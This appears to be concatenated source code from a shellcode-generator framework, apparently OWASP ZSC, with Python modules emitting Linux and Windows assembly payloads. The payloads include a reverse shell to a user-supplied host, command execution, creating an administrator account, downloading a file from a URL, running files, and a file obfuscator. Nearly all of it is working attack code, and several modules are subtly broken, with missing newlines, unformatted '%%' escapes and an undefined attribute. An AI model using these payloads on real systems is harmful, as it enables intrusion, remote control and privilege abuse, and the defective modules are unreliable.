class Module(base_module.BasePayload):
command = base_module.OptString("", "Command to execute")
def generate(self):
payload = "push $0xb\n"
payload += "pop %eax\n"
payload += "cltd\n"
payload += "push %edx\n"
payload += stack.generate(self.command, '%ecx', 'string')
payload += "mov %esp, %esi\n"
payload += "push %edx\n"
payload += "push $0x632d9090\n"
payload += "pop %ecx\n"
payload += "shr $0x10, %ecx\n"
payload += "push %ecx\n"
payload += "mov %esp, %ecx\n"
payload += "push %edx\n"
payload += "push $0x68\n"
payload += "push $0x7361622f\n"
payload += "push $0x6e69622f\n"
payload += "mov %esp, %ebx\n"
payload += "push %edx\n"
payload += "push %edi\n"
payload += "push %esi\n"
payload += "push %ecx\n"
payload += "push %ebx\n"
payload += "mov %esp, %ecx\n"
payload += "int $0x80\n"
return payload
def run(self):
if not self.command:
alert.error("A command is required.")
return
self.handle_generate(__name__)
class Module(base_module.BasePayload):
lhost = base_module.OptIP("", "Listen IP address")
lport = base_module.OptPort("", "Listen port")
shell = base_module.OptString("/bin/sh", "Shell to execute")
def generate(self):
payload = "mov $1, %bl\n"
payload += "push $0\n"
payload += "push $1\n"
payload += "push $2\n"
payload += "mov %esp, %ecx\n"
payload += "mov $0x66, %al\n"
payload += "int $0x80\n"
payload += f"push ${stack.ipv4_to_hex(self.lhost)}\n" # PUSH IP
if self.lport < 256:
payload += f"mov ${hex(self.lport)}, %bl\n" # MOV PORT
else:
payload += f"mov ${hex(self.lport)}, %bx\n" # MOV PORT
payload += "push %bx\n"
payload += "mov $0x2, %bl\n"
payload += "push %bx\n"
payload += "mov %esp, %ebx\n"
payload += "push $0x10\n"
payload += "push %ebx\n"
payload += "push %eax\n"
payload += "mov %esp, %ecx\n"
payload += "mov $0x3, %bl\n"
payload += "push %eax\n"
payload += "mov $0x66, %al\n"
payload += "int $0x80\n"
payload += "pop %ebx\n"
payload += "mov $0x2, %cl\n"
payload += "mov $0x3f, %al\n"
payload += "int $0x80\n"
payload += "dec %ecx\n"
payload += "mov $0x3f, %al\n"
payload += "int $0x80\n"
payload += stack.generate(self.shell, '%ebx', 'string')
payload += "mov %esp, %ebx\n"
payload += "xor %eax, %eax\n"
payload += "push %eax\n"
payload += "push %ebx\n"
payload += "mov %esp, %ecx\n"
payload += "xor %edx, %edx\n"
payload += "mov $0xb, %al\n"
payload += "int $0x80\n"
return payload
def run(self):
if not self.lhost:
alert.error("Listen address")
return
if not self.lport:
alert.error("Listen port")
return
self.handle_generate(__name__)
class Module(base_module.BaseModule):
file = base_module.OptString("", "File to obfuscate")
type = base_module.OptString("", "File type")
def run(self):
if not self.file:
alert.error("File option is required")
return
if not self.method:
alert.error("An obfuscation method is required")
return
from owasp_zsc.libs import obfuscate
import importlib
try:
module_path = obfuscate.__path__[0].split("owasp_zsc")[1].replace(
"/", ".")
module = importlib.import_module(
f"owasp_zsc{module_path}.{self.type}.{self.method}")
module = getattr(module, "ObfuscateModule")()
if hasattr(module, "times"):
setattr(module, "times", self.times
) # FIX submodule doesn't take new times from options
alert.info("Getting file content")
content = open(self.file).read()
if not content.strip():
alert.error("File is empty!")
return
alert.info("Obfuscating file content")
obfuscated_content = module.start(content)
alert.info("Generating obfuscated script")
f = open(self.file, "w")
f.write(obfuscated_content)
f.close()
alert.info("Completed. Your file is obfuscated.")
except AttributeError:
traceback.print_exc()
alert.error("Invalid module")
except:
traceback.print_exc()
class Module(base_module.BasePayload):
# FIXME 1: program crashes when full path of file is too long
# FIXME 2: file contents is not contents only
target_file = base_module.OptString("", "File to write data")
content = base_module.OptString("", "File's data")
def generate(self):
null = len(self.target_file) % 4
if null != 0:
null = ''
else:
null = 'xor %ebx, %ebx\npush %ebx\n'
payload = "push $0x5\n"
payload += "pop %eax\n"
payload += null
payload += stack.generate(str(self.target_file), '%ebx', 'string')
payload += "mov %esp, %ebx\n"
payload += "push $0x4014141\n"
payload += "pop %ecx\n"
payload += "shr $0x10, %ecx\n"
payload += "int $0x80\n"
payload += "mov %eax, %ebx\n"
payload += "push $0x4\n"
payload += "pop %eax\n"
payload += stack.generate(str(self.content), '%ecx', 'string')
payload += "mov %esp, %ecx\n"
payload += stack.generate(str(len(self.content)), '%edx', 'int')
payload += "int $0x80\n"
payload += "mov $0x1, %al\n"
payload += "mov $0x1, %bl\n"
payload += "int $0x80\n"
return payload
def run(self):
if not self.target_file:
alert.error("Target file is required")
return
if not self.content:
alert.error("File's content is required")
return
self.handle_generate(__name__)
class Module(base_module.BasePayload):
perm = base_module.OptString("", "Permission mask") # TODO improve descr
file_dest = base_module.OptString("", "File Target") # TODO improve descr
def generate(self):
payload = "xor %%eax, %%eax"
payload += "push %%eax"
payload += stack.generate(self.file_dest, '%ebx', 'string')
payload += "mov %%esp, %%edx"
payload += stack.generate(self.perm, '%ecx', 'int')
payload += "push %%edx"
payload += "push $0xf"
payload += "pop %%eax"
payload += "push $0x2a"
payload += "int $0x80"
payload += "mov $0x01, %%al"
payload += "mov $0x01, %%bl"
payload += "int $0x80"
return payload
def run(self):
print(self.generate())
class Module(base_module.BasePayload):
target_file = base_module.OptString("", "Target file to change permission")
permission = base_module.OptString("", "Permission mask (number)")
def generate(self):
payload = "push $0x0f\n"
payload += "pop %eax\n"
payload += stack.generate(self.permission, '%ecx', 'int')
payload += stack.generate(self.target_file, '%ebx', 'string')
payload += "mov %esp, %ebx\n"
payload += "int $0x80\n"
payload += "mov $0x01, %al\n"
payload += "mov $0x01, %bl\n"
payload += "int $0x80\n"
return payload
def run(self):
if not self.target_file:
alert.error("Target file and file's permissions are required")
return
if not self.permission:
alert.error("Target's permission is required")
return
self.handle_generate(__name__)
class Module(base_module.BasePayload):
file_dest = base_module.OptString("", "Destination file")
def generate(self):
payload = stack.generate(self.file_dest, '%ebx', 'string')
payload += "mov %%esp, %%ebx"
payload += "xor %%eax, %%eax"
payload += "push %%eax"
payload += "mov %%esp, %%edx"
payload += "push %%ebx"
payload += "mov %%esp, %%ecx"
payload += "push %%edx"
payload += "push %%ecx"
payload += "push %%ebx"
payload += "mov $0x3b, %%al"
payload += "push $0x2a"
payload += "int $0x80"
payload += "mov $0x1, %%al"
payload += "mov $0x1, %%bl"
payload += "int $0x80"
return payload
class Module(base_module.BasePayload):
target_file = base_module.OptString("", "Target file to execute file")
def generate(self):
payload = "mov $0x46, %al\n"
payload += "xor %ebx, %ebx\n"
payload += "xor %ecx, %ecx\n"
payload += "int $0x80\n"
payload += stack.generate(self.target_file, '%ebx', 'string')
payload += "mov %esp, %ebx\n"
payload += "xor %eax, %eax\n"
payload += "mov $0xb, %al\n"
payload += "int $0x80\n"
payload += "mov $0x1, %al\n"
payload += "mov $0x1, %bl\n"
payload += "int $0x80"
return payload
def run(self):
if not self.target_file:
alert.error("Target file is required")
return
self.handle_generate(__name__)
class Module(base_module.BasePayload):
username = base_module.OptString("", "Username")
password = base_module.OptString("", "Password")
def generate(self, command, cvtcommand):
payload = "xor %ecx, %ecx"
payload += "mov %fs:0x30(%ecx), %eax"
payload += "mov 0xc(%eax), %eax"
payload += "mov 0x14(%eax), %esi"
payload += "lods %ds:(%esi), %eax"
payload += "xchg %eax, %esi"
payload += "lods %ds:(%esi), %eax"
payload += "mov 0x10(%eax), %ebx"
payload += "mov 0x3c(%ebx), %edx"
payload += "add %ebx, %edx"
payload += "mov 0x78(%edx), %edx"
payload += "add %ebx, %edx"
payload += "mov 0x20(%edx), %esi"
payload += "add %ebx, %esi"
payload += "xor %ecx, %ecx"
payload += "inc %ecx"
payload += "lods %ds:(%esi), %eax"
payload += "add %ebx, %eax"
payload += "cmpl $0x50746547, (%eax)"
payload += "jne 23 <.text+0x23>"
payload += "cmpl $0x41636f72, 0x4(%eax)"
payload += "jne 23 <.text+0x23>"
payload += "cmpl $0x65726464, 0x8(%eax)"
payload += "jne 23 <.text+0x23>"
payload += "mov 0x24(%edx), %esi"
payload += "add %ebx, %esi"
payload += "mov (%esi, %ecx, 2), %cx"
payload += "dec %ecx"
payload += "mov 0x1c(%edx), %esi"
payload += "add %ebx, %esi"
payload += "mov (%esi, %ecx, 4), %edx"
payload += "add %ebx, %edx"
payload += "push %ebx"
payload += "push %edx"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "mov $0x61636578, %ecx"
payload += "push %ecx"
payload += "subl $0x61, 0x3(%esp)"
payload += "push $0x456e6957"
payload += "push %esp"
payload += "push %ebx"
payload += "call *%edx"
payload += "add $0x8, %esp"
payload += "pop %ecx"
payload += "push %eax"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += command
payload += "xor %ebx, %ebx"
payload += "mov %esp, %ebx"
payload += "xor %ecx, %ecx"
payload += "inc %ecx"
payload += "push %ecx"
payload += "push %ebx"
payload += "call *%eax"
payload += f"add ${cvtcommand}, %esp"
payload += "pop %edx"
payload += "pop %ebx"
payload += "xor %ecx, %ecx"
payload += "mov $0x61737365, %ecx"
payload += "push %ecx"
payload += "subl $0x61, 0x3(%esp)"
payload += "push $0x636f7250"
payload += "push $0x74697845"
payload += "push %esp"
payload += "push %ebx"
payload += "call *%edx"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "call *%eax"
return payload
def run(self):
command = f"cmd.exe /c net user {self.username} {self.password} /add && " \
f"net localgroup administrators {self.username} /add "
print(
self.generate(stack.generate(command, "%ecx", "string"),
hex(int(8 + 4 * (ceil(len(command) / float(4)))))))
class Module(base_module.BasePayload):
target_file = base_module.OptString("", "Target file to execute")
def generate(self):
payload = "xor %ecx, %ecx\n"
payload += "mov %fs:0x30(%ecx), %eax\n"
payload += "mov 0xc(%eax), %eax\n"
payload += "mov 0x14(%eax), %esi\n"
payload += "lods %ds:(%esi), %eax\n"
payload += "xchg %eax, %esi\n"
payload += "lods %ds:(%esi), %eax\n"
payload += "mov 0x10(%eax), %ebx\n"
payload += "mov 0x3c(%ebx), %edx\n"
payload += "add %ebx, %edx\n"
payload += "mov 0x78(%edx), %edx\n"
payload += "add %ebx, %edx\n"
payload += "mov 0x20(%edx), %esi\n"
payload += "add %ebx, %esi\n"
payload += "xor %ecx, %ecx\n"
payload += "inc %ecx\n"
payload += "lods %ds:(%esi), %eax\n"
payload += "add %ebx, %eax\n"
payload += "cmpl $0x50746547, (%eax)\n"
payload += "jne 23 <.text+0x23>\n"
payload += "cmpl $0x41636f72, 0x4(%eax)\n"
payload += "jne 23 <.text+0x23>\n"
payload += "cmpl $0x65726464, 0x8(%eax)\n"
payload += "jne 23 <.text+0x23>\n"
payload += "mov 0x24(%edx), %esi\n"
payload += "add %ebx, %esi\n"
payload += "mov (%esi, %ecx, 2), %cx\n"
payload += "dec %ecx\n"
payload += "mov 0x1c(%edx), %esi\n"
payload += "add %ebx, %esi\n"
payload += "mov (%esi, %ecx, 4), %edx\n"
payload += "add %ebx, %edx\n"
payload += "push %ebx\n"
payload += "push %edx\n"
payload += "xor %ecx, %ecx\n"
payload += "push %ecx\n"
payload += "mov $0x61636578, %ecx\n"
payload += "push %ecx\n"
payload += "subl $0x61, 0x3(%esp)\n"
payload += "push $0x456e6957\n"
payload += "push %esp\n"
payload += "push %ebx\n"
payload += "call *%edx\n"
payload += "add $0x8, %esp\n"
payload += "pop %ecx\n"
payload += "push %eax\n"
payload += "xor %ecx, %ecx\n"
payload += "push %ecx\n"
payload += stack.generate(self.target_file, "%ecx", "string")
payload += "xor %ebx, %ebx\n"
payload += "mov %esp, %ebx\n"
payload += "xor %ecx, %ecx\n"
payload += "inc %ecx\n"
payload += "push %ecx\n"
payload += "push %ebx\n"
payload += "call *%eax\n"
payload += f"add ${hex(int(8 + 4 * (ceil(len(self.target_file) / float(4)))))}, %esp\n"
payload += "pop %edx\n"
payload += "pop %ebx\n"
payload += "xor %ecx, %ecx\n"
payload += "mov $0x61737365, %ecx\n"
payload += "push %ecx\n"
payload += "subl $0x61, 0x3(%esp)\n"
payload += "push $0x636f7250\n"
payload += "push $0x74697845\n"
payload += "push %esp\n"
payload += "push %ebx\n"
payload += "call *%edx\n"
payload += "xor %ecx, %ecx\n"
payload += "push %ecx\n"
payload += "call *%eax\n"
return payload
def run(self):
if not self.target_file:
alert.error("Target file and file's permissions are required")
return
try:
import traceback
self.handle_generate(__name__)
except:
traceback.print_exc()
class Module(base_module.BasePayload):
file_dest = base_module.OptString("", "File dest") # TODO improve descr
def generate(self):
payload = "sub $0x20, %rsp"
payload += "and $0xfffffffffffffff0, %rsp"
payload += "mov %gs:0x60, %r12"
payload += "mov 0x18(%r12), %r12"
payload += "mov 0x20(%r12), %r12"
payload += "mov (%r12), %r12"
payload += "mov 0x20(%r12), %r15"
payload += "mov (%r12), %r12"
payload += "mov 0x20(%r12), %r12"
payload += "mov $0xe8afe98, %rdx"
payload += "mov %r12, %rcx"
payload += "mov %r12, %r12"
payload += "callq 0x401067"
payload += "jmp 0x401059"
payload += "pop %rcx"
payload += "mov $0x1, %edx"
payload += "callq *%rax"
payload += "mov $0x2d3fcd70, %edx"
payload += "mov %r15, %rcx"
payload += "callq 0x401067"
payload += "xor %rcx, %rcx"
payload += "callq *%rax"
payload += "callq 0x40103f"
payload += "movslq 0x6c(%rcx), %esp"
payload += "movslq (%rsi), %ebp"
payload += "gs js 0x4010cb"
payload += "add %cl, -0x77(%rcx)"
payload += "int $0x67"
payload += "mov 0x3c(%r13), %eax"
payload += "mov 0x88(%r13d, %eax, 1), %r14d"
payload += "add %r13d, %r14d"
payload += "mov 0x18(%r14d), %r10d"
payload += "mov 0x20(%r14d), %ebx"
payload += "add %r13d, %ebx"
payload += "jecxz 0x4010ca"
payload += "dec %r10d"
payload += "mov (%ebx, %r10d, 4), %esi"
payload += "add %r13d, %esi"
payload += "xor %edi, %edi"
payload += "xor %eax, %eax"
payload += "cld"
payload += "lodsb %ds:(%rsi), %al"
payload += "test %al, %al"
payload += "je 0x4010a7"
payload += "ror $0xd, %edi"
payload += "add %eax, %edi"
payload += "jmp 0x40109b"
payload += "cmp %edx, %edi"
payload += "jne 0x401088"
payload += "mov 0x24(%r14d), %ebx"
payload += "add %r13d, %ebx"
payload += "xor %ecx, %ecx"
payload += "mov (%ebx, %r10d, 2), %cx"
payload += "mov 0x1c(%r14d), %ebx"
payload += "add %r13d, %ebx"
payload += "mov (%ebx, %ecx, 4), %eax"
payload += "add %r13d, %eax"
payload += "retq"
payload += "add %al, (%rax)"
payload += "add %al, (%rax)"
return payload
def run(self):
print(self.generate())
class Module(base_module.BasePayload):
url = base_module.OptString("", "URL to download") # TODO improve descr
file_dest = base_module.OptString("", "File name") # TODO improve descr
def generate(self):
payload = "xor %ecx, %ecx"
payload += "mov %fs:0x30(%ecx), %eax"
payload += "mov 0xc(%eax), %eax"
payload += "mov 0x14(%eax), %esi"
payload += "lods %ds:(%esi), %eax"
payload += "xchg %eax, %esi"
payload += "lods %ds:(%esi), %eax"
payload += "mov 0x10(%eax), %ebx"
payload += "mov 0x3c(%ebx), %edx"
payload += "add %ebx, %edx"
payload += "mov 0x78(%edx), %edx"
payload += "add %ebx, %edx"
payload += "mov 0x20(%edx), %esi"
payload += "add %ebx, %esi"
payload += "xor %ecx, %ecx"
payload += "inc %ecx"
payload += "lods %ds:(%esi), %eax"
payload += "add %ebx, %eax"
payload += "cmpl $0x50746547, (%eax)"
payload += "jne 23 <.text+0x23>"
payload += "cmpl $0x41636f72, 0x4(%eax)"
payload += "jne 23 <.text+0x23>"
payload += "cmpl $0x65726464, 0x8(%eax)"
payload += "jne 23 <.text+0x23>"
payload += "mov 0x24(%edx), %esi"
payload += "add %ebx, %esi"
payload += "mov (%esi, %ecx, 2), %cx"
payload += "dec %ecx"
payload += "mov 0x1c(%edx), %esi"
payload += "add %ebx, %esi"
payload += "mov (%esi, %ecx, 4), %edx"
payload += "add %ebx, %edx"
payload += "xor %esi, %esi"
payload += "mov %edx, %esi"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "push $0x41797261"
payload += "push $0x7262694c"
payload += "push $0x64616f4c"
payload += "push %esp"
payload += "push %ebx"
payload += "call *%edx"
payload += "xor %ecx, %ecx"
payload += "mov $0x6c6c, %cx"
payload += "push %ecx"
payload += "push $0x642e6e6f"
payload += "push $0x6d6c7275"
payload += "push %esp"
payload += "call *%eax"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "mov $0x4165, %cx"
payload += "push %ecx"
payload += "push $0x6c69466f"
payload += "push $0x5464616f"
payload += "push $0x6c6e776f"
payload += "push $0x444c5255"
payload += "mov %esp, %ecx"
payload += "push %ecx"
payload += "push %eax"
payload += "call *%esi"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += stack.generate(self.url, "%ecx", "string")
payload += "xor %edi, %edi"
payload += "mov %esp, %edi"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += stack.generate(self.filename, "%ecx", "string")
payload += "xor %edx, %edx"
payload += "mov %esp, %edx"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "push %ecx"
payload += "push %edx"
payload += "push %edi"
payload += "push %ecx"
payload += "call *%eax"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "push $0x73736590"
payload += "pop %ecx"
payload += "shr $0x8, %ecx"
payload += "push %ecx"
payload += "push $0x636f7250"
payload += "push $0x74697845"
payload += "push %esp"
payload += "push %ebx"
payload += "call *%esi"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "call *%eax"
return payload
def run(self):
print(self.generate())
class Module(base_module.BasePayload):
file_dest = base_module.OptString("", "File Destination")
data = base_module.OptString("", "File data")
def generate(self, command):
payload = "xor %ecx, %ecx"
payload += "mov %fs:0x30(%ecx), %eax"
payload += "mov 0xc(%eax), %eax"
payload += "mov 0x14(%eax), %esi"
payload += "lods %ds:(%esi), %eax"
payload += "xchg %eax, %esi"
payload += "lods %ds:(%esi), %eax"
payload += "mov 0x10(%eax), %ebx"
payload += "mov 0x3c(%ebx), %edx"
payload += "add %ebx, %edx"
payload += "mov 0x78(%edx), %edx"
payload += "add %ebx, %edx"
payload += "mov 0x20(%edx), %esi"
payload += "add %ebx, %esi"
payload += "xor %ecx, %ecx"
payload += "inc %ecx"
payload += "lods %ds:(%esi), %eax"
payload += "add %ebx, %eax"
payload += "cmpl $0x50746547, (%eax)"
payload += "jne 23 <.text+0x23>"
payload += "cmpl $0x41636f72, 0x4(%eax)"
payload += "jne 23 <.text+0x23>"
payload += "cmpl $0x65726464, 0x8(%eax)"
payload += "jne 23 <.text+0x23>"
payload += "mov 0x24(%edx), %esi"
payload += "add %ebx, %esi"
payload += "mov (%esi, %ecx, 2), %cx"
payload += "dec %ecx"
payload += "mov 0x1c(%edx), %esi"
payload += "add %ebx, %esi"
payload += "mov (%esi, %ecx, 4), %edx"
payload += "add %ebx, %edx"
payload += "xor %esi, %esi"
payload += "mov %edx, %esi"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "push $0x41797261"
payload += "push $0x7262694c"
payload += "push $0x64616f4c"
payload += "push %esp"
payload += "push %ebx"
payload += "call *%edx"
payload += "xor %ecx, %ecx"
payload += "mov $0x6c6c, %cx"
payload += "push %ecx"
payload += "push $0x642e7472"
payload += "push $0x6376736d"
payload += "push %esp"
payload += "call *%eax"
payload += "xor %edi, %edi"
payload += "mov %eax, %edi"
payload += "xor %edx, %edx"
payload += "push %edx"
payload += "mov $0x6d65, %dx"
payload += "push %edx"
payload += "push $0x74737973"
payload += "mov %esp, %ecx"
payload += "push %ecx"
payload += "push %edi"
payload += "xor %edx, %edx"
payload += "mov %esi, %edx"
payload += "call *%edx"
payload += "xor %ecx, %ecx"
payload += command
payload += "push %esp"
payload += "call *%eax"
payload += "xor %edx, %edx"
payload += "push %edx"
payload += "push $0x74697865"
payload += "mov %esp, %ecx"
payload += "push %ecx"
payload += "push %edi"
payload += "call *%esi"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "call *%eax"
return payload
def run(self):
command = stack.generate(f"echo {self.data} > {self.file_dest}",
"%ecx", "string")
print(self.generate(command))
class Module(base_module.BasePayload):
dest_file = base_module.OptString("notepad.exe", "File to execute")
def generate(self, dest):
payload = "bits 64"
payload += "section .text"
payload += "global start"
payload += ""
payload += "start:"
payload += ";get dll base addresses"
payload += " sub rsp, 20h ;reserve stack space for called functions"
payload += " and rsp, 0fffffffffffffff0h ;make sure stack 16-byte aligned "
payload += " "
payload += " mov r12, [gs:60h] ;peb"
payload += " mov r12, [r12 + 0x18] ;Peb --> LDR"
payload += " mov r12, [r12 + 0x20] ;Peb.Ldr.InMemoryOrderModuleList"
payload += " mov r12, [r12] ;2st entry"
payload += " mov r15, [r12 + 0x20] ;ntdll.dll base address!"
payload += " mov r12, [r12] ;3nd entry"
payload += " mov r12, [r12 + 0x20] ;kernel32.dll base address!"
payload += " "
payload += ";find address of winexec from kernel32.dll which was found above. "
payload += " mov rdx, 0xe8afe98 ; hash of winexec given to rdx "
payload += " mov rcx, r12 ; rcx has dll address now"
payload += " mov r12, r12"
payload += " call GetProcessAddress ; give arguments in rdx and rcx and get rax back with winexex"
payload += " "
payload += "; the winexec call"
payload += " jmp GetProgramName"
payload += ""
payload += "ExecProgram:"
payload += " pop rcx ;rcx has the handle to the calc.exe string (1st argument)"
payload += " mov edx, 1"
payload += " call rax"
payload += " "
payload += ";ExitProcess"
payload += " mov rdx, 0x2d3fcd70 "
payload += " mov rcx, r15"
payload += " call GetProcessAddress"
payload += " xor rcx, rcx ;uExitCode"
payload += " call rax "
payload += ""
payload += ";get program name"
payload += "GetProgramName:"
payload += " call ExecProgram"
payload += f" db {dest}"
payload += " db 0x00 ; null terminated string"
payload += ""
payload += ";Hashing section to resolve a function address "
payload += "GetProcessAddress: "
payload += " mov r13, rcx ;base address of dll loaded - rdx has winexec, rcx has kernel32 addr"
payload += " mov eax, [r13d + 0x3c] ;skip DOS header and go to PE header"
payload += " mov r14d, [r13d + eax + 0x88] ;0x88 offset from the PE header == the export table. "
payload += " add r14d, r13d ;make the export table an absolute base address and put it in r14d."
payload += ""
payload += " mov r10d, [r14d + 0x18] ;go into the export table and get the numberOfNames "
payload += " mov ebx, [r14d + 0x20] ;get the AddressOfNames offset. "
payload += " add ebx, r13d ;AddressofNames base. "
payload += " "
payload += "find_function_loop: "
payload += " jecxz find_function_finished ; jump short if ecx == zero. nothing found "
payload += " dec r10d ;dec ECX by one for the loop"
payload += " mov esi, [ebx + r10d * 4] ;get a name to from the export table. "
payload += " add esi, r13d ;esi == now the current name to search on. "
payload += " "
payload += "find_hashes:"
payload += " xor edi, edi"
payload += " xor eax, eax"
payload += " cld"
payload += ""
payload += ";this block computes the hash for whatever == at esi "
payload += "continue_hashing: "
payload += " lodsb ;load byte at ds:esi to al"
payload += " test al, al ;is the end of string resarched?"
payload += " jz compute_hash_finished"
payload += " ror dword edi, 0xd ;ROR13 for hash calculation!"
payload += " add edi, eax ; edi has the hash from the hash calculation"
payload += " jmp continue_hashing"
payload += ""
payload += "; this block checks the hash and then gives back the function loaded at eax "
payload += "compute_hash_finished:"
payload += " cmp edi, edx ;edx has the function hash (rdx , rcx was passed on from above)"
payload += " jnz find_function_loop ;didn't match, keep trying!"
payload += " mov ebx, [r14d + 0x24] ;put the address of the ordinal table and put it in ebx. "
payload += " add ebx, r13d ;absolute address"
payload += " xor ecx, ecx ;ensure ecx == 0'd. "
payload += " mov cx, [ebx + 2 * r10d] ;ordinal = 2 bytes. Get the current ordinal and put it in cx." \
" ECX was our counter for which # we were in. "
payload += " mov ebx, [r14d + 0x1c] ;extract the address table offset"
payload += " add ebx, r13d ;put absolute address in EBX."
payload += " mov eax, [ebx + 4 * ecx] ;relative address"
payload += " add eax, r13d ; eax has the required function given by the hash in rcx"
payload += ""
payload += ""
payload += "find_function_finished:"
payload += " ret"
return payload
def run(self):
file_dest = stack.generate(self.dest_file, "%ecx", "string")
print(self.generate(file_dest))
class Module(base_module.BasePayload):
dirname = base_module.OptString("", "Dir name") # TODO improve descr
def generate(self):
payload = "xor %ecx, %ecx"
payload += "mov %fs:0x30(%ecx), %eax"
payload += "mov 0xc(%eax), %eax"
payload += "mov 0x14(%eax), %esi"
payload += "lods %ds:(%esi), %eax"
payload += "xchg %eax, %esi"
payload += "lods %ds:(%esi), %eax"
payload += "mov 0x10(%eax), %ebx"
payload += "mov 0x3c(%ebx), %edx"
payload += "add %ebx, %edx"
payload += "mov 0x78(%edx), %edx"
payload += "add %ebx, %edx"
payload += "mov 0x20(%edx), %esi"
payload += "add %ebx, %esi"
payload += "xor %ecx, %ecx"
payload += "inc %ecx"
payload += "lods %ds:(%esi), %eax"
payload += "add %ebx, %eax"
payload += "cmpl $0x50746547, (%eax)"
payload += "jne 23 <.text+0x23>"
payload += "cmpl $0x41636f72, 0x4(%eax)"
payload += "jne 23 <.text+0x23>"
payload += "cmpl $0x65726464, 0x8(%eax)"
payload += "jne 23 <.text+0x23>"
payload += "mov 0x24(%edx), %esi"
payload += "add %ebx, %esi"
payload += "mov (%esi, %ecx, 2), %cx"
payload += "dec %ecx"
payload += "mov 0x1c(%edx), %esi"
payload += "add %ebx, %esi"
payload += "mov (%esi, %ecx, 4), %edx"
payload += "add %ebx, %edx"
payload += "push %ebx"
payload += "push %edx"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "push $0x4179726f"
payload += "push $0x74636572"
payload += "push $0x69446574"
payload += "push $0x61657243"
payload += "push %esp"
payload += "push %ebx"
payload += "call *%edx"
payload += "add $0x10, %esp"
payload += "pop %ecx"
payload += "push %eax"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += stack.generate(self.dirname, "%ecx", "string")
payload += "xor %ebx, %ebx"
payload += "mov %esp, %ebx"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "push %ebx"
payload += "call *%eax"
payload += f"add ${hex(int(8 + 4 * (ceil(len(self.dirname) / float(4)))))}, %esp"
payload += "pop %edx"
payload += "pop %ebx"
payload += "xor %ecx, %ecx"
payload += "mov $0x61737365, %ecx"
payload += "push %ecx"
payload += "subl $0x61, 0x3(%esp)"
payload += "push $0x636f7250"
payload += "push $0x74697845"
payload += "push %esp"
payload += "push %ebx"
payload += "call *%edx"
payload += "xor %ecx, %ecx"
payload += "push %ecx"
payload += "call *%eax"
return payload
def run(self):
print(self.generate())
class Obfuscator(base_module.BaseModule):
method = base_module.OptString("", "Obfuscate method")